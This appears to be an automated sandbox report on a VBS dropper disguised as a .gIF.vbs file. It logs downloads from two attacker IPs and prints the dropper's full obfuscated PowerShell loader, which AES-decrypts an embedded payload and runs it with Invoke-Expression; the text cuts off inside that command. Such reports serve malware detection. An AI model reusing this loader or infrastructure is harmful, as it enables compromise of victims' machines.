        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: System.pdb source: powershell.exe, 00000002.00000002.2309336237.000001242A070000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetInterfaceImplProps source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldMarshal source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeDef source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeDefs source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportMember source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumInterfaceImpls source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: ows\dll\System.pdb$ source: powershell.exe, 00000002.00000002.2309336237.000001242A144000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp
        Source: Binary string: H:\New Private Panell Src 3.0 New\New Private Panell Src 3.0 2025\New Private Panell Src 3.0\dnlib-fuscator-master win7\src\obj\Debug\dnlib.pdb source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2312538012.000001242A7C0000.00000004.08000000.00040000.00000000.sdmp

        Software Vulnerabilities

        barindex
        Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Source: creatednewwaterbottleforme.gIF.vbsBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4
        Source: creatednewwaterbottleforme.gIF.vbsBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4
        Source: global trafficHTTP traffic detected: GET /Upload/vbs.jpeg HTTP/1.1Host: 198.46.176.133Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /60/WDER.txt HTTP/1.1Host: 192.3.176.174Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /60/WDER.txt HTTP/1.1Host: 192.3.176.174Connection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 198.46.176.133 198.46.176.133
        Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
        Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
        Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
        Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
        Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
        Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
        Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
        Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
        Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
        Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
        Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
        Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
        Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
        Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
        Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
        Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
        Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
        Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
        Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
        Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
        Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
        Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
        Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
        Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
        Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
        Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
        Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
        Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
        Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
        Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
        Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
        Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
        Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
        Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
        Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
        Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
        Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
        Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
        Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
        Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
        Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
        Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
        Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
        Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
        Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
        Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
        Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
        Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
        Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
        Source: unknownTCP traffic detected without corresponding DNS query: 198.46.176.133
        Source: global trafficHTTP traffic detected: GET /Upload/vbs.jpeg HTTP/1.1Host: 198.46.176.133Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /60/WDER.txt HTTP/1.1Host: 192.3.176.174Connection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /60/WDER.txt HTTP/1.1Host: 192.3.176.174Connection: Keep-Alive
        Source: powershell.exe, 00000002.00000002.2213002122.00000124124FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.174
        Source: powershell.exe, 00000002.00000002.2213002122.0000012412626000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.174(
        Source: powershell.exe, 00000002.00000002.2213002122.00000124124FD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.176.174/60/WDER.txt
        Source: powershell.exe, 00000002.00000002.2213002122.0000012412294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://198.46.176.133
        Source: powershell.exe, 00000002.00000002.2213002122.0000012412294000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2311562493.000001242A370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.2309336237.000001242A144000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://198.46.176.133/Upload/vbs.jpeg
        Source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
        Source: powershell.exe, 00000002.00000002.2213002122.0000012412294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 00000002.00000002.2213002122.0000012412071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 00000002.00000002.2213002122.0000012412294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000002.00000002.2213002122.0000012412071000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
        Source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
        Source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
        Source: powershell.exe, 00000002.00000002.2213002122.0000012412294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 00000002.00000002.2271508581.00000124220E0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe

        System Summary

        barindex
        Source: Process Memory Space: powershell.exe PID: 2144, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 3116
        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 3116Jump to behavior
        Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command (('((e4jfunction Decrypt-AESEncryption {Param([String]TMIBase64Text,[Stringe4j+e4j]TMIKey)TMIe4j+e4jaesManaged = New-Object System.See4j+e4jcurity.Cryptography.AesManaged;TMIa'+'esManagee4j+e4'+'jd.Modee4j+e4j = [Syse4j+'+'e4jtem.Security.Cryptoge4j+e4jraphy.e4j+e'+'4jCie4'+'j+e4jpherMode]::CBC;TMIaesManaged.'+'Pae4j+e4jddin'+'g = [System.Security.Cryptography.PaddingMode]::Zeros;TMIaesManaged.BlockSiz'+'e = 128;TMIaesManaged.KeySize = 256;'+'TMIaesManagee4j+'+'e4jd.Key = ('+'New-Objecte4'+'j+e4j System.Security.Cryptography.SHA256Managed).ComputeHash([Syste'+'m.Text.Encoding]::UTF8.Gee4j+e4jtBytes(TMIKey));TMIcipherBytes = [Syst'+'em.Convert]::FromBase64String(TMIBase64Text);TMIaesManaged.IV '+'= TMIcipherBytes[0..15];TMIdecryptor = TMIaesManaged.CreateDecryptor();TMIdecryptedBytes = TMIdecryptor.TransformFin'+'alBlock(TMIcipherBytes, 16, TMIcipherBytes.Length - 16);e4j+e4jTMIae'+'sManaged.D'+'ispose('+');return [System.Text.Encoding]::UTF8.GetString'+'(TMIdecry'+'ptedBytes).Tre4j+e4jim([char]0);}TMIchave = CnI68766530954276373206247047974663CnIe4j+e4j;TMItextoCriptogr'+'afadoBase4j+e4je64 = '+'CnIdSLZBgRjPNZ/qocg/lH2aZHZ5Jl+3cjSG1p/+zzQRClxM6ERqs615j4oDskIGVeU9U0hKzWE2qLRhN3w3oPnP9D3zRR0BjWDDOAHuyfLsijMtAivmVqnjEhi75GYn/731w2sw2LX9rePUu8MuzZBPukpDJjP40wnUy5RXUPJoZQj2IJHLLwPLeWAVLyYam2ryxj+aZ147db0X48wxpHj1wzIXORWhGABOaWwaSlaHL3gmVyt1aXV7FBFES5QqtebxGfvLhl4iUZNYV88W0LKeIoUGNbEQFkzf13DC0Iby1tFcGdBD33I0Q+W2Tvg+5qcSyDt39hGQc+cPQJW6i+zS5PdayxMRwfx6SHZXH4Wqvwv1PSLLBL05m+vUyyZdWHee1jJZK1IYpJ679FIiTnjUqbP5xka/o9mFQDN8rr6+t3w5UZ8/qZmHx1mVRoEQQE9sfqxRdM4XzLD6zM0xvTyXDiPtOrir9Y56WYwILgvowZC7rtlCr5vnoqSqCeZ+TBUh3I8J+drjXQv5Li4WPY7XJzFYZPaPMsWDQEjc1bMNXhVQ0Ukf2iM7FfM7k6Nze4qwdaBy3eAeQAbrjji8e0i57J7CMED36TsJyhF0u03e/7/3gWxHIosnVfstQl9YchNNE0mcQpHtSiF3PXt9EE9Ulz//7YH3sp7ZQKed24Zy6boPjqU9Ryt/0qHB2CgOA9dDgikPiavuiSSZwbmMVP3wzAzgXN3nBCy0PstnP16FjfPsLfXhDA3NS1dtwaJQ0liDeM77UG2Ki38eJ/rruKe9qgo+FuHe0xchT8/Wf5NVYoxrcASiFgam2A+WOxlafeNmbR8szgcpCGnpZl/NgN6OssaRDn26lO+fP2jr2C/5Yc3McAo0Ld51WdEwKzWP8b1W57wqS7gMMfAyZ4qaXwBt0DPwXCDT4lDwrWOtFJtHKkrSrB29mx+ZSiTGJd4zwLYP4xGKn+mDlT0rPmQDAZM0Hkrfyo5dxlRZHsLsW0XCN3EuXI+4932vGm0QSE+1K4quce5wQtHb1zoJKShclZ3BMUvCdOwmEdkxUQXKG7DtjDx8uVaNsAElTRbqENfoYu9eWmyI9LzKR9oZNPS+COhZr5JHq9hpvTMcsOldartIGHZY80SQMOSaGVIgdyoyJGpNwdUZLlDYe8NYQDaAJUhcq27lHvZkYQVajhD3kDVJQbOIf1lYyaY52Jn1dHnhXGk0nluzd0ilXEHvzPHLaVeocoCd50UQJ+q1KgXN7gS2k+ZoaXgaMSw9ouBoVyLc2V04RD098/AS2dEb2//QHWXG3F0c50KqYP4QoW398pQnbg4M4pJz0UIDlflEkkDinQrkxq/DRVpVBWz7wRUbde9F6yxo/vtkM0dGIR+Udwiy0EWC9HpU+MKlp45fqh0Pc7VyS3cHOu8E4FMallUVE4yfg==CnI;TMItextoDescriptografado = Decrypt-AESEncryption -'+'Base64Text TMItextoCriptografadoBase64 -Key TMIchave;W'+'rite-Host CnITexe4j+e4jto Descre4j+e4jiptografado: TMI'+'textoDescriptograe4j+e4jfadoCnI;Invoke-Expressioe4j+e4jn 